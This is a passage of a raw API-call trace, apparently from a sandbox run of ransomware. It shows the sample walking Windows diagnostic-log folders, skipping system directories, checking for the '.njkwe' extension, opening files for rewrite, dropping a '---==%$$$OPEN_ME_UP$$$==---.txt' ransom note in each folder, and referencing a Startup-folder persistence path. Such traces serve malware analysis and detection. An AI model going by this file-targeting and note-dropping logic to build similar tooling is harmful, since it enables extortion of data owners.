"c:\\programdata\\microsoft\\diagnosis\\etllogs\\autologger\\autologger-diagtrack-listener.etl_r00t_{3sxle5}.njkwe")) returned 1 [0073.244] GetProcessHeap () returned 0xbe0000 [0073.244] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0073.244] FindNextFileW (in: hFindFile=0xc1a260, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcd8d859b, ftCreationTime.dwHighDateTime=0x1d34734, ftLastAccessTime.dwLowDateTime=0xcd8d859b, ftLastAccessTime.dwHighDateTime=0x1d34734, ftLastWriteTime.dwLowDateTime=0xac487de2, ftLastWriteTime.dwHighDateTime=0x1d4d5d3, nFileSizeHigh=0x0, nFileSizeLow=0x30000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="AutoLogger-Diagtrack-Listener.etl", cAlternateFileName="AUTOLO~1.ETL")) returned 0 [0073.244] FindClose (in: hFindFile=0xc1a260 | out: hFindFile=0xc1a260) returned 1 [0073.244] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 89 [0073.244] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\diagnosis\\etllogs\\autologger\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0073.244] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0073.245] CloseHandle (hObject=0x434) returned 1 [0073.245] GetProcessHeap () returned 0xbe0000 [0073.245] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0073.245] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd69f80c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ScenarioShutdownLogger", cAlternateFileName="SCENAR~1")) returned 1 [0073.245] lstrcmpiW (lpString1="ScenarioShutdownLogger", lpString2="Windows") returned -1 [0073.245] lstrcmpiW (lpString1="ScenarioShutdownLogger", lpString2="$Recycle.bin") returned 1 [0073.245] lstrcmpiW (lpString1="ScenarioShutdownLogger", lpString2="System Volume Information") returned -1 [0073.245] lstrcmpiW (lpString1="ScenarioShutdownLogger", lpString2="Program Files") returned 1 [0073.245] lstrcmpiW (lpString1="ScenarioShutdownLogger", lpString2="Program Files (x86)") returned 1 [0073.245] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ScenarioShutdownLogger") returned 69 [0073.245] lstrcmpW (lpString1="ScenarioShutdownLogger", lpString2=".") returned 1 [0073.245] lstrcmpW (lpString1="ScenarioShutdownLogger", lpString2="..") returned 1 [0073.246] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ScenarioShutdownLogger", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.246] GetProcessHeap () returned 0xbe0000 [0073.246] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0073.246] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ScenarioShutdownLogger\\*") returned 71 [0073.246] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ScenarioShutdownLogger\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd69f80c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a1a0 [0073.246] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.246] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.246] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.246] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.246] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.246] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ScenarioShutdownLogger\\.") returned 71 [0073.246] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.246] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0073.246] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.246] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0073.246] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ScenarioShutdownLogger\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.246] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ScenarioShutdownLogger\\." (normalized: "c:\\programdata\\microsoft\\diagnosis\\etllogs\\scenarioshutdownlogger\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.246] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd69f80c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.246] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.246] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.246] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.246] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.246] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.246] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ScenarioShutdownLogger\\..") returned 72 [0073.246] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.247] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.247] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0073.247] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.247] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0073.247] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ScenarioShutdownLogger\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.247] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ScenarioShutdownLogger\\.." (normalized: "c:\\programdata\\microsoft\\diagnosis\\etllogs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.247] FindNextFileW (in: hFindFile=0xc1a1a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd69f80c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c95299, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 0 [0073.247] FindClose (in: hFindFile=0xc1a1a0 | out: hFindFile=0xc1a1a0) returned 1 [0073.247] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ScenarioShutdownLogger\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 101 [0073.247] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ScenarioShutdownLogger\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\diagnosis\\etllogs\\scenarioshutdownlogger\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0073.352] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0073.353] CloseHandle (hObject=0x434) returned 1 [0073.353] GetProcessHeap () returned 0xbe0000 [0073.353] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0073.353] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x2d6afbff, ftLastAccessTime.dwHighDateTime=0x1d336e0, ftLastWriteTime.dwLowDateTime=0x2d6afbff, ftLastWriteTime.dwHighDateTime=0x1d336e0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ShutdownLogger", cAlternateFileName="SHUTDO~1")) returned 1 [0073.353] lstrcmpiW (lpString1="ShutdownLogger", lpString2="Windows") returned -1 [0073.353] lstrcmpiW (lpString1="ShutdownLogger", lpString2="$Recycle.bin") returned 1 [0073.353] lstrcmpiW (lpString1="ShutdownLogger", lpString2="System Volume Information") returned -1 [0073.353] lstrcmpiW (lpString1="ShutdownLogger", lpString2="Program Files") returned 1 [0073.353] lstrcmpiW (lpString1="ShutdownLogger", lpString2="Program Files (x86)") returned 1 [0073.353] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger") returned 61 [0073.353] lstrcmpW (lpString1="ShutdownLogger", lpString2=".") returned 1 [0073.353] lstrcmpW (lpString1="ShutdownLogger", lpString2="..") returned 1 [0073.353] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0073.353] GetProcessHeap () returned 0xbe0000 [0073.353] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0073.353] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\*") returned 63 [0073.353] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x2d6afbff, ftLastAccessTime.dwHighDateTime=0x1d336e0, ftLastWriteTime.dwLowDateTime=0xb855a1cd, ftLastWriteTime.dwHighDateTime=0x1d33839, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc19fe0 [0073.354] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0073.354] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0073.354] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0073.354] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0073.354] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0073.354] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\.") returned 63 [0073.354] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.354] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0073.354] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.354] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0073.354] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.354] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\." (normalized: "c:\\programdata\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.355] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x2d6afbff, ftLastAccessTime.dwHighDateTime=0x1d336e0, ftLastWriteTime.dwLowDateTime=0xb855a1cd, ftLastWriteTime.dwHighDateTime=0x1d33839, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0073.355] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0073.355] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0073.355] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0073.355] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0073.355] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0073.355] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\..") returned 64 [0073.355] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.355] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.355] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0073.355] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0073.355] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0073.355] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.355] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\.." (normalized: "c:\\programdata\\microsoft\\diagnosis\\etllogs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.355] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb855a1cd, ftCreationTime.dwHighDateTime=0x1d33839, ftLastAccessTime.dwLowDateTime=0xb855a1cd, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0xbc623573, ftLastWriteTime.dwHighDateTime=0x1d33839, nFileSizeHigh=0x0, nFileSizeLow=0x20000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="AutoLogger-Diagtrack-Listener.etl", cAlternateFileName="AUTOLO~1.ETL")) returned 1 [0073.355] lstrcmpiW (lpString1="AutoLogger-Diagtrack-Listener.etl", lpString2="Windows") returned -1 [0073.355] lstrcmpiW (lpString1="AutoLogger-Diagtrack-Listener.etl", lpString2="$Recycle.bin") returned 1 [0073.355] lstrcmpiW (lpString1="AutoLogger-Diagtrack-Listener.etl", lpString2="System Volume Information") returned -1 [0073.355] lstrcmpiW (lpString1="AutoLogger-Diagtrack-Listener.etl", lpString2="Program Files") returned -1 [0073.355] lstrcmpiW (lpString1="AutoLogger-Diagtrack-Listener.etl", lpString2="Program Files (x86)") returned -1 [0073.355] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\AutoLogger-Diagtrack-Listener.etl") returned 95 [0073.355] StrStrIW (lpFirst="AutoLogger-Diagtrack-Listener.etl", lpSrch=".njkwe") returned 0x0 [0073.355] lstrcmpW (lpString1="AutoLogger-Diagtrack-Listener.etl", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.355] lstrcmpW (lpString1="AutoLogger-Diagtrack-Listener.etl", lpString2="taridd") returned -1 [0073.355] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\AutoLogger-Diagtrack-Listener.etl", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.355] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\AutoLogger-Diagtrack-Listener.etl" (normalized: "c:\\programdata\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\autologger-diagtrack-listener.etl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.356] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb855a1cd, ftCreationTime.dwHighDateTime=0x1d33839, ftLastAccessTime.dwLowDateTime=0xb855a1cd, ftLastAccessTime.dwHighDateTime=0x1d33839, ftLastWriteTime.dwLowDateTime=0xbc623573, ftLastWriteTime.dwHighDateTime=0x1d33839, nFileSizeHigh=0x0, nFileSizeLow=0x20000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="AutoLogger-Diagtrack-Listener.etl", cAlternateFileName="AUTOLO~1.ETL")) returned 0 [0073.356] FindClose (in: hFindFile=0xc19fe0 | out: hFindFile=0xc19fe0) returned 1 [0073.356] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 93 [0073.356] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\ShutdownLogger\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\diagnosis\\etllogs\\shutdownlogger\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0073.356] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0073.357] CloseHandle (hObject=0x434) returned 1 [0073.357] GetProcessHeap () returned 0xbe0000 [0073.357] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0073.357] FindNextFileW (in: hFindFile=0xc1a1e0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c95299, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x2d6afbff, ftLastAccessTime.dwHighDateTime=0x1d336e0, ftLastWriteTime.dwLowDateTime=0x2d6afbff, ftLastWriteTime.dwHighDateTime=0x1d336e0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="ShutdownLogger", cAlternateFileName="SHUTDO~1")) returned 0 [0073.357] FindClose (in: hFindFile=0xc1a1e0 | out: hFindFile=0xc1a1e0) returned 1 [0073.357] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 78 [0073.357] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\ETLLogs\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\diagnosis\\etllogs\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0073.357] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0073.358] CloseHandle (hObject=0x430) returned 1 [0073.358] GetProcessHeap () returned 0xbe0000 [0073.358] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0073.358] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b60b8d0, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8b60b8d0, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x29662597, ftLastWriteTime.dwHighDateTime=0x1d336e0, nFileSizeHigh=0x0, nFileSizeLow=0x666666, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Events_CostDeferred.rbs", cAlternateFileName="EVENTS~3.RBS")) returned 1 [0073.359] lstrcmpiW (lpString1="Events_CostDeferred.rbs", lpString2="Windows") returned -1 [0073.359] lstrcmpiW (lpString1="Events_CostDeferred.rbs", lpString2="$Recycle.bin") returned 1 [0073.359] lstrcmpiW (lpString1="Events_CostDeferred.rbs", lpString2="System Volume Information") returned -1 [0073.359] lstrcmpiW (lpString1="Events_CostDeferred.rbs", lpString2="Program Files") returned -1 [0073.359] lstrcmpiW (lpString1="Events_CostDeferred.rbs", lpString2="Program Files (x86)") returned -1 [0073.359] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Events_CostDeferred.rbs") returned 62 [0073.359] StrStrIW (lpFirst="Events_CostDeferred.rbs", lpSrch=".njkwe") returned 0x0 [0073.359] lstrcmpW (lpString1="Events_CostDeferred.rbs", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.359] lstrcmpW (lpString1="Events_CostDeferred.rbs", lpString2="taridd") returned -1 [0073.359] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Events_CostDeferred.rbs", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.359] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Events_CostDeferred.rbs" (normalized: "c:\\programdata\\microsoft\\diagnosis\\events_costdeferred.rbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.359] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b5e567a, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8b5e567a, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x29662597, ftLastWriteTime.dwHighDateTime=0x1d336e0, nFileSizeHigh=0x0, nFileSizeLow=0x1000000, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Events_Normal.rbs", cAlternateFileName="EVENTS~1.RBS")) returned 1 [0073.359] lstrcmpiW (lpString1="Events_Normal.rbs", lpString2="Windows") returned -1 [0073.359] lstrcmpiW (lpString1="Events_Normal.rbs", lpString2="$Recycle.bin") returned 1 [0073.359] lstrcmpiW (lpString1="Events_Normal.rbs", lpString2="System Volume Information") returned -1 [0073.359] lstrcmpiW (lpString1="Events_Normal.rbs", lpString2="Program Files") returned -1 [0073.359] lstrcmpiW (lpString1="Events_Normal.rbs", lpString2="Program Files (x86)") returned -1 [0073.359] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Events_Normal.rbs") returned 56 [0073.359] StrStrIW (lpFirst="Events_Normal.rbs", lpSrch=".njkwe") returned 0x0 [0073.359] lstrcmpW (lpString1="Events_Normal.rbs", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.359] lstrcmpW (lpString1="Events_Normal.rbs", lpString2="taridd") returned -1 [0073.359] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Events_Normal.rbs", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0073.359] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Events_Normal.rbs" (normalized: "c:\\programdata\\microsoft\\diagnosis\\events_normal.rbs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 